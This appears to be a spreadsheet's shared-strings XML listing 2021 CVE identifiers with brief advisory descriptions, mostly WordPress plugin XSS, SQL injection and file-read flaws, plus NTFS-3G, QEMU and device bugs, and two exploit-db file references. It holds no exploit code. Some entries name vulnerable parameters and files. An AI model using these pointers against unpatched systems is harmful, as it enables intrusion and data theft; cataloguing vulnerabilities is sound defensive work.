  <si>
    <t>A crafted NTFS image can cause an out-of-bounds read in ntfs_runlists_merge_i in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39254</t>
  </si>
  <si>
    <t>A crafted NTFS image can cause an integer overflow in memmove, leading to a heap-based buffer overflow in the function ntfs_attr_record_resize, in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39255</t>
  </si>
  <si>
    <t>A crafted NTFS image can trigger an out-of-bounds read, caused by an invalid attribute in ntfs_attr_find_in_attrdef, in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39256</t>
  </si>
  <si>
    <t>A crafted NTFS image can cause a heap-based buffer overflow in ntfs_inode_lookup_by_name in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39257</t>
  </si>
  <si>
    <t>A crafted NTFS image with an unallocated bitmap can lead to a endless recursive function call chain (starting from ntfs_attr_pwrite), causing stack consumption in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39258</t>
  </si>
  <si>
    <t>A crafted NTFS image can cause out-of-bounds reads in ntfs_attr_find and ntfs_external_attr_find in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39259</t>
  </si>
  <si>
    <t>A crafted NTFS image can trigger an out-of-bounds access, caused by an unsanitized attribute length in ntfs_inode_lookup_by_name, in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39260</t>
  </si>
  <si>
    <t>A crafted NTFS image can cause an out-of-bounds access in ntfs_inode_sync_standard_information in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39261</t>
  </si>
  <si>
    <t>A crafted NTFS image can cause a heap-based buffer overflow in ntfs_compressed_pwrite in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39262</t>
  </si>
  <si>
    <t>A crafted NTFS image can cause an out-of-bounds access in ntfs_decompress in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39263</t>
  </si>
  <si>
    <t>A crafted NTFS image can trigger a heap-based buffer overflow, caused by an unsanitized attribute in ntfs_get_attribute_value, in NTFS-3G &lt; 2021.8.22.</t>
  </si>
  <si>
    <t>CVE-2021-39267</t>
  </si>
  <si>
    <t>Persistent cross-site scripting (XSS) in the web interface of SuiteCRM before 7.11.19 allows a remote attacker to introduce arbitrary JavaScript via a Content-Type Filter bypass to upload malicious files. This occurs because text/html is blocked, but other types that allow JavaScript execution (such as text/xml) are not blocked.</t>
  </si>
  <si>
    <t>CVE-2021-39268</t>
  </si>
  <si>
    <t>Persistent cross-site scripting (XSS) in the web interface of SuiteCRM before 7.11.19 allows a remote attacker to introduce arbitrary JavaScript via malicious SVG files. This occurs because the clean_file_output protection mechanism can be bypassed.</t>
  </si>
  <si>
    <t>CVE-2021-3927</t>
  </si>
  <si>
    <t>CVE-2021-39270</t>
  </si>
  <si>
    <t>In Ping Identity RSA SecurID Integration Kit before 3.2, user impersonation can occur.</t>
  </si>
  <si>
    <t>CVE-2021-39271</t>
  </si>
  <si>
    <t>OrbiTeam BSCW Classic before 7.4.3 allows authenticated remote code execution (RCE) during archive extraction via attacker-supplied Python code in the class attribute of a .bscw file. This is fixed in 5.0.12, 5.1.10, 5.2.4, 7.3.3, and 7.4.3.</t>
  </si>
  <si>
    <t>CVE-2021-39272</t>
  </si>
  <si>
    <t>Fetchmail before 6.4.22 fails to enforce STARTTLS session encryption in some circumstances, such as a certain situation with IMAP and PREAUTH.</t>
  </si>
  <si>
    <t>CVE-2021-39273</t>
  </si>
  <si>
    <t>In XeroSecurity Sn1per 9.0 (free version), insecure permissions (0777) are set upon application execution, allowing an unprivileged user to modify the application, modules, and configuration files. This leads to arbitrary code execution with root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-39274</t>
  </si>
  <si>
    <t>In XeroSecurity Sn1per 9.0 (free version), insecure directory permissions (0777) are set during installation, allowing an unprivileged user to modify the main application and the application configuration file. This results in arbitrary code execution with root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-39275</t>
  </si>
  <si>
    <t>ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier.</t>
  </si>
  <si>
    <t>CVE-2021-39278</t>
  </si>
  <si>
    <t>Certain MOXA devices allow reflected XSS via the Config Import menu. This affects WAC-2004 1.7, WAC-1001 2.1, WAC-1001-T 2.1, OnCell G3470A-LTE-EU 1.7, OnCell G3470A-LTE-EU-T 1.7, TAP-323-EU-CT-T 1.3, TAP-323-US-CT-T 1.3, TAP-323-JP-CT-T 1.3, WDR-3124A-EU 2.3, WDR-3124A-EU-T 2.3, WDR-3124A-US 2.3, and WDR-3124A-US-T 2.3.</t>
  </si>
  <si>
    <t>CVE-2021-39279</t>
  </si>
  <si>
    <t>Certain MOXA devices allow Authenticated Command Injection via /forms/web_importTFTP. This affects WAC-2004 1.7, WAC-1001 2.1, WAC-1001-T 2.1, OnCell G3470A-LTE-EU 1.7, OnCell G3470A-LTE-EU-T 1.7, TAP-323-EU-CT-T 1.3, TAP-323-US-CT-T 1.3, TAP-323-JP-CT-T 1.3, WDR-3124A-EU 2.3, WDR-3124A-EU-T 2.3, WDR-3124A-US 2.3, and WDR-3124A-US-T 2.3.</t>
  </si>
  <si>
    <t>CVE-2021-3928</t>
  </si>
  <si>
    <t>vim is vulnerable to Use of Uninitialized Variable</t>
  </si>
  <si>
    <t>CVE-2021-39280</t>
  </si>
  <si>
    <t>Certain Korenix JetWave devices allow authenticated users to execute arbitrary code as root via /syscmd.asp. This affects 2212X before 1.9.1, 2212S before 1.9.1, 2212G before 1.8, 3220 V3 before 1.5.1, 3420 V3 before 1.5.1, and 2311 through 2022-01-31.</t>
  </si>
  <si>
    <t>CVE-2021-39282</t>
  </si>
  <si>
    <t>Live555 through 1.08 has a memory leak in AC3AudioStreamParser for AC3 files.</t>
  </si>
  <si>
    <t>CVE-2021-39283</t>
  </si>
  <si>
    <t>liveMedia/FramedSource.cpp in Live555 through 1.08 allows an assertion failure and application exit via multiple SETUP and PLAY commands.</t>
  </si>
  <si>
    <t>CVE-2021-39285</t>
  </si>
  <si>
    <t>A XSS vulnerability exists in Versa Director Release: 16.1R2 Build: S8. An attacker can use the administration web interface URL to create a XSS based attack.</t>
  </si>
  <si>
    <t>CVE-2021-39286</t>
  </si>
  <si>
    <t>Webrecorder pywb before 2.6.0 allows XSS because it does not ensure that Jinja2 templates are autoescaped.</t>
  </si>
  <si>
    <t>CVE-2021-39289</t>
  </si>
  <si>
    <t>Certain NetModule devices have Insecure Password Handling (cleartext or reversible encryption), These models with firmware before 4.3.0.113, 4.4.0.111, and 4.5.0.105 are affected: NB800, NB1600, NB1601, NB1800, NB1810, NB2700, NB2710, NB2800, NB2810, NB3700, NB3701, NB3710, NB3711, NB3720, and NB3800.</t>
  </si>
  <si>
    <t>CVE-2021-3929</t>
  </si>
  <si>
    <t>A DMA reentrancy issue was found in the NVM Express Controller (NVME) emulation in QEMU. This CVE is similar to CVE-2021-3750 and, just like it, when the reentrancy write triggers the reset function nvme_ctrl_reset(), data structs will be freed leading to a use-after-free issue. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition or, potentially, executing arbitrary code within the context of the QEMU process on the host.</t>
  </si>
  <si>
    <t>CVE-2021-39290</t>
  </si>
  <si>
    <t>Certain NetModule devices allow Limited Session Fixation via PHPSESSID. These models with firmware before 4.3.0.113, 4.4.0.111, and 4.5.0.105 are affected: NB800, NB1600, NB1601, NB1800, NB1810, NB2700, NB2710, NB2800, NB2810, NB3700, NB3701, NB3710, NB3711, NB3720, and NB3800.</t>
  </si>
  <si>
    <t>CVE-2021-39291</t>
  </si>
  <si>
    <t>Certain NetModule devices allow credentials via GET parameters to CLI-PHP. These models with firmware before 4.3.0.113, 4.4.0.111, and 4.5.0.105 are affected: NB800, NB1600, NB1601, NB1800, NB1810, NB2700, NB2710, NB2800, NB2810, NB3700, NB3701, NB3710, NB3711, NB3720, and NB3800.</t>
  </si>
  <si>
    <t>CVE-2021-39293</t>
  </si>
  <si>
    <t>In archive/zip in Go before 1.16.8 and 1.17.x before 1.17.1, a crafted archive header (falsely designating that many files are present) can cause a NewReader or OpenReader panic. NOTE: this issue exists because of an incomplete fix for CVE-2021-33196.</t>
  </si>
  <si>
    <t>CVE-2021-39296</t>
  </si>
  <si>
    <t>In OpenBMC 2.9, crafted IPMI messages allow an attacker to bypass authentication and gain full control of the system.</t>
  </si>
  <si>
    <t>CVE-2021-39297</t>
  </si>
  <si>
    <t>Potential vulnerabilities have been identified in UEFI firmware (BIOS) for some PC products which may allow escalation of privilege and arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-39298</t>
  </si>
  <si>
    <t>A potential vulnerability in AMD System Management Mode (SMM) interrupt handler may allow an attacker with high privileges to access the SMM resulting in arbitrary code execution which could be used by malicious actors to bypass security mechanisms provided in the UEFI firmware.</t>
  </si>
  <si>
    <t>CVE-2021-39299</t>
  </si>
  <si>
    <t>CVE-2021-3930</t>
  </si>
  <si>
    <t>An off-by-one error was found in the SCSI device emulation in QEMU. It could occur while processing MODE SELECT commands in mode_sense_page() if the 'page' argument was set to MODE_PAGE_ALLS (0x3f). A malicious guest could use this flaw to potentially crash QEMU, resulting in a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2021-39300</t>
  </si>
  <si>
    <t>CVE-2021-39301</t>
  </si>
  <si>
    <t>CVE-2021-39302</t>
  </si>
  <si>
    <t>MISP 2.4.148, in certain configurations, allows SQL injection via the app/Model/Log.php $conditions['org'] value.</t>
  </si>
  <si>
    <t>CVE-2021-39303</t>
  </si>
  <si>
    <t>The server in Jamf Pro before 10.32.0 has an SSRF vulnerability, aka PI-006352. NOTE: Jamf Nation will also publish an article about this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-39304</t>
  </si>
  <si>
    <t>Proofpoint Enterprise Protection before 8.12.0-2108090000 allows security control bypass.</t>
  </si>
  <si>
    <t>CVE-2021-39306</t>
  </si>
  <si>
    <t>A stack buffer overflow was discovered on Realtek RTL8195AM device before 2.0.10, it exists in the client code when an attacker sends a big size Authentication challenge text in WEP security.</t>
  </si>
  <si>
    <t>CVE-2021-39307</t>
  </si>
  <si>
    <t>PDFTron's WebViewer UI 8.0 or below renders dangerous URLs as hyperlinks in supported documents, including JavaScript URLs, allowing the execution of arbitrary JavaScript code.</t>
  </si>
  <si>
    <t>CVE-2021-39308</t>
  </si>
  <si>
    <t>The WooCommerce myghpay Payment Gateway WordPess plugin is vulnerable to Reflected Cross-Site Scripting via the clientref parameter found in the ~/processresponse.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.0.</t>
  </si>
  <si>
    <t>CVE-2021-39309</t>
  </si>
  <si>
    <t>The Parsian Bank Gateway for Woocommerce WordPress plugin is vulnerable to Reflected Cross-Site Scripting via and parameter due to a var_dump() on $_POST variables found in the ~/vendor/dpsoft/parsian-payment/sample/rollback-payment.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.</t>
  </si>
  <si>
    <t>CVE-2021-3931</t>
  </si>
  <si>
    <t>exploits/php/webapps/50624.py</t>
  </si>
  <si>
    <t>WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)</t>
  </si>
  <si>
    <t>CVE-2021-39310</t>
  </si>
  <si>
    <t>The Real WYSIWYG WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of PHP_SELF in the ~/real-wysiwyg.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.0.2.</t>
  </si>
  <si>
    <t>CVE-2021-39311</t>
  </si>
  <si>
    <t>The link-list-manager WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the category parameter found in the ~/llm.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.</t>
  </si>
  <si>
    <t>CVE-2021-39312</t>
  </si>
  <si>
    <t>The True Ranker plugin &lt;= 2.2.2 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.</t>
  </si>
  <si>
    <t>CVE-2021-39313</t>
  </si>
  <si>
    <t>The Simple Image Gallery WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the msg parameter found in the ~/simple-image-gallery.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.6.</t>
  </si>
  <si>
    <t>CVE-2021-39314</t>
  </si>
  <si>
    <t>The WooCommerce EnvioPack WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the dataid parameter found in the ~/includes/functions.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.2.</t>
  </si>
  <si>
    <t>CVE-2021-39315</t>
  </si>
  <si>
    <t>The Magic Post Voice WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the ids parameter found in the ~/inc/admin/main.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.2.</t>
  </si>
  <si>
    <t>CVE-2021-39316</t>
  </si>
  <si>
    <t>The Zoomsounds plugin &lt;= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.</t>
  </si>
  <si>
    <t>CVE-2021-39317</t>
  </si>
  <si>
    <t>A WordPress plugin and several WordPress themes developed by AccessPress Themes are vulnerable to malicious file uploads via the plugin_offline_installer AJAX action due to a missing capability check in the plugin_offline_installer_callback function found in the /demo-functions.php file or /welcome.php file of the affected products. The complete list of affected products and their versions are below: WordPress Plugin: AccessPress Demo Importer &lt;=1.0.6 WordPress Themes: accesspress-basic &lt;= 3.2.1 accesspress-lite &lt;= 2.92 accesspress-mag &lt;= 2.6.5 accesspress-parallax &lt;= 4.5 accesspress-root &lt;= 2.5 accesspress-store &lt;= 2.4.9 agency-lite &lt;= 1.1.6 arrival &lt;= 1.4.2 bingle &lt;= 1.0.4 bloger &lt;= 1.2.6 brovy &lt;= 1.3 construction-lite &lt;= 1.2.5 doko &lt;= 1.0.27 edict-lite &lt;= 1.1.4 eightlaw-lite &lt;= 2.1.5 eightmedi-lite &lt;= 2.1.8 eight-sec &lt;= 1.1.4 eightstore-lite &lt;= 1.2.5 enlighten &lt;= 1.3.5 fotography &lt;= 2.4.0 opstore &lt;= 1.4.3 parallaxsome &lt;= 1.3.6 punte &lt;= 1.1.2 revolve &lt;= 1.3.1 ripple &lt;= 1.2.0 sakala &lt;= 1.0.4 scrollme &lt;= 2.1.0 storevilla &lt;= 1.4.1 swing-lite &lt;= 1.1.9 the100 &lt;= 1.1.2 the-launcher &lt;= 1.3.2 the-monday &lt;= 1.4.1 ultra-seven &lt;= 1.2.8 uncode-lite &lt;= 1.3.3 vmag &lt;= 1.2.7 vmagazine-lite &lt;= 1.3.5 vmagazine-news &lt;= 1.0.5 wpparallax &lt;= 2.0.6 wp-store &lt;= 1.1.9 zigcy-baby &lt;= 1.0.6 zigcy-cosmetics &lt;= 1.0.5 zigcy-lite &lt;= 2.0.9</t>
  </si>
  <si>
    <t>CVE-2021-39318</t>
  </si>
  <si>
    <t>The H5P CSS Editor WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the h5p-css-file parameter found in the ~/h5p-css-editor.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.</t>
  </si>
  <si>
    <t>CVE-2021-39319</t>
  </si>
  <si>
    <t>The duoFAQ - Responsive, Flat, Simple FAQ WordPess plugin is vulnerable to Reflected Cross-Site Scripting via the msg parameter found in the ~/duogeek/duogeek-panel.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.4.8.</t>
  </si>
  <si>
    <t>CVE-2021-3932</t>
  </si>
  <si>
    <t>twill is vulnerable to Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>exploits/php/webapps/50382.py</t>
  </si>
  <si>
    <t>Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure</t>
  </si>
  <si>
    <t>2021-10-06</t>
  </si>
  <si>
    <t>CVE-2021-39320</t>
  </si>
  <si>
    <t>The underConstruction plugin &lt;= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path.</t>
  </si>
  <si>
    <t>CVE-2021-39321</t>
  </si>
  <si>
    <t>Version 3.3.23 of the Sassy Social Share WordPress plugin is vulnerable to PHP Object Injection via the wp_ajax_heateor_sss_import_config AJAX action due to deserialization of unvalidated user supplied inputs via the import_config function found in the ~/admin/class-sassy-social-share-admin.php file. This can be exploited by underprivileged authenticated users due to a missing capability check on the import_config function.</t>
  </si>
  <si>
    <t>CVE-2021-39322</t>
  </si>
  <si>
    <t>The Easy Social Icons plugin &lt;= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path.</t>
  </si>
  <si>
    <t>CVE-2021-39325</t>
  </si>
  <si>
    <t>The OptinMonster WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to insufficient input validation in the load_previews function found in the ~/OMAPI/Output.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.6.0.</t>
  </si>
  <si>
    <t>CVE-2021-39327</t>
  </si>
  <si>
    <t>The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.</t>
  </si>
  <si>
    <t>CVE-2021-39328</t>
  </si>
  <si>
    <t>The Simple Job Board WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient escaping on the $job_board_privacy_policy_label variable echo'd out via the ~/admin/settings/class-simple-job-board-settings-privacy.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 2.9.4. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39329</t>
  </si>
  <si>
    <t>The JobBoardWP WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/includes/admin/class-metabox.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 1.0.7. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-3933</t>
  </si>
  <si>
    <t>An integer overflow could occur when OpenEXR processes a crafted file on systems where size_t &lt; 64 bits. This could cause an invalid bytesPerLine and maxBytesPerLine value, which could lead to problems with application stability or lead to other attack paths.</t>
  </si>
  <si>
    <t>CVE-2021-39332</t>
  </si>
  <si>
    <t>The Business Manager WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization found throughout the plugin which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 1.4.5. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39333</t>
  </si>
  <si>
    <t>The Hashthemes Demo Importer Plugin &lt;= 1.1.1 for WordPress contained several AJAX functions which relied on a nonce which was visible to all logged-in users for access control, allowing them to execute a function that truncated nearly all database tables and removed the contents of wp-content/uploads.</t>
  </si>
  <si>
    <t>CVE-2021-39334</t>
  </si>
  <si>
    <t>The Job Board Vanila WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via the psjb_exp_in and the psjb_curr_in parameters found in the ~/job-settings.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 1.0. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39335</t>
  </si>
  <si>
    <t>The WpGenius Job Listing WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/src/admin/class/class-wpgenious-job-listing-options.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 1.0.2. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39336</t>
  </si>
  <si>
    <t>The Job Manager WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/admin-jobs.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 0.7.25. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39337</t>
  </si>
  <si>
    <t>The job-portal WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/admin/jobs_function.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 0.0.1. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39338</t>
  </si>
  <si>
    <t>The MyBB Cross-Poster WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/classes/MyBBXPSettings.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 1.0. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39339</t>
  </si>
  <si>
    <t>The Telefication WordPress plugin is vulnerable to Open Proxy and Server-Side Request Forgery via the ~/bypass.php file due to a user-supplied URL request value that gets called by a curl requests. This affects versions up to, and including, 1.8.0.</t>
  </si>
  <si>
    <t>CVE-2021-3934</t>
  </si>
  <si>
    <t>ohmyzsh is vulnerable to Improper Neutralization of Special Elements used in an OS Command</t>
  </si>
  <si>
    <t>CVE-2021-39340</t>
  </si>
  <si>
    <t>The Notification WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/src/classes/Utils/Settings.php file which made it possible for attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 7.2.4. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39341</t>
  </si>
  <si>
    <t>The OptinMonster WordPress plugin is vulnerable to sensitive information disclosure and unauthorized setting updates due to insufficient authorization validation via the logged_in_or_has_api_key function in the ~/OMAPI/RestApi.php file that can used to exploit inject malicious web scripts on sites with the plugin installed. This affects versions up to, and including, 2.6.4.</t>
  </si>
  <si>
    <t>CVE-2021-39342</t>
  </si>
  <si>
    <t>The Credova_Financial WordPress plugin discloses a site's associated Credova API account username and password in plaintext via an AJAX action whenever a site user goes to checkout on a page that has the Credova Financing option enabled. This affects versions up to, and including, 1.4.8.</t>
  </si>
  <si>
    <t>CVE-2021-39343</t>
  </si>
  <si>
    <t>The MPL-Publisher WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/libs/PublisherController.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 1.30.2. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39344</t>
  </si>
  <si>
    <t>The KJM Admin Notices WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/admin/class-kjm-admin-notices-admin.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 2.0.1. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39345</t>
  </si>
  <si>
    <t>The HAL WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/wp-hal.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 2.1.1. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39346</t>
  </si>
  <si>
    <t>The Google Maps Easy WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/modules/marker_groups/views/tpl/mgrEditMarkerGroup.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 1.9.33. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39347</t>
  </si>
  <si>
    <t>The Stripe for WooCommerce WordPress plugin is missing a capability check on the save() function found in the ~/includes/admin/class-wc-stripe-admin-user-edit.php file that makes it possible for attackers to configure their account to use other site users unique STRIPE identifier and make purchases with their payment accounts. This affects versions 3.0.0 - 3.3.9.</t>
  </si>
  <si>
    <t>CVE-2021-39348</t>
  </si>
  <si>
    <t>The LearnPress WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient escaping on the $custom_profile parameter found in the ~/inc/admin/views/backend-user-profile.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 4.1.3.1. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled. Please note that this is seperate from CVE-2021-24702.</t>
  </si>
  <si>
    <t>CVE-2021-39349</t>
  </si>
  <si>
    <t>The Author Bio Box WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/includes/admin/class-author-bio-box-admin.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 3.3.1. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-3935</t>
  </si>
  <si>
    <t>When PgBouncer is configured to use "cert" authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of TLS certificate verification and encryption. This flaw affects PgBouncer versions prior to 1.16.1.</t>
  </si>
  <si>
    <t>CVE-2021-39350</t>
  </si>
  <si>
    <t>The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.</t>
  </si>
  <si>
    <t>CVE-2021-39351</t>
  </si>
  <si>
    <t>The WP Bannerize WordPress plugin is vulnerable to authenticated SQL injection via the id parameter found in the ~/Classes/wpBannerizeAdmin.php file which allows attackers to exfiltrate sensitive information from vulnerable sites. This issue affects versions 2.0.0 - 4.0.2.</t>
  </si>
  <si>
    <t>CVE-2021-39352</t>
  </si>
  <si>
    <t>The Catch Themes Demo Import WordPress plugin is vulnerable to arbitrary file uploads via the import functionality found in the ~/inc/CatchThemesDemoImport.php file, in versions up to and including 1.7, due to insufficient file type validation. This makes it possible for an attacker with administrative privileges to upload malicious files that can be used to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-39353</t>
  </si>
  <si>
    <t>The Easy Registration Forms WordPress plugin is vulnerable to Cross-Site Request Forgery due to missing nonce validation via the ajax_add_form function found in the ~/includes/class-form.php file which made it possible for attackers to inject arbitrary web scripts in versions up to, and including 2.1.1.</t>
  </si>
  <si>
    <t>CVE-2021-39354</t>
  </si>
  <si>
    <t>The Easy Digital Downloads WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the $start_date and $end_date parameters found in the ~/includes/admin/payments/class-payments-table.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.11.2.</t>
  </si>
  <si>
    <t>CVE-2021-39355</t>
  </si>
  <si>
    <t>The Indeed Job Importer WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the ~/indeed-job-importer/trunk/indeed-job-importer.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 1.0.5. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39356</t>
  </si>
  <si>
    <t>The Content Staging WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and escaping via several parameters that are echo'd out via the ~/templates/settings.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 2.0.1. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39357</t>
  </si>
  <si>
    <t>The Leaky Paywall WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via the ~/class.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 4.16.5. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.</t>
  </si>
  <si>
    <t>CVE-2021-39358</t>
  </si>
  <si>
    <t>In GNOME libgfbgraph through 0.2.4, gfbgraph-photo.c does not enable TLS certificate verification on the SoupSessionSync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.</t>
  </si>
  <si>
    <t>CVE-2021-39359</t>
  </si>
  <si>
    <t>In GNOME libgda through 6.0.0, gda-web-provider.c does not enable TLS certificate verification on the SoupSessionSync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.</t>
  </si>
  <si>
    <t>CVE-2021-39360</t>
  </si>
  <si>
    <t>In GNOME libzapojit through 0.0.3, zpj-skydrive.c does not enable TLS certificate verification on the SoupSessionSync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.</t>
  </si>
  <si>
    <t>CVE-2021-39361</t>
  </si>
  <si>
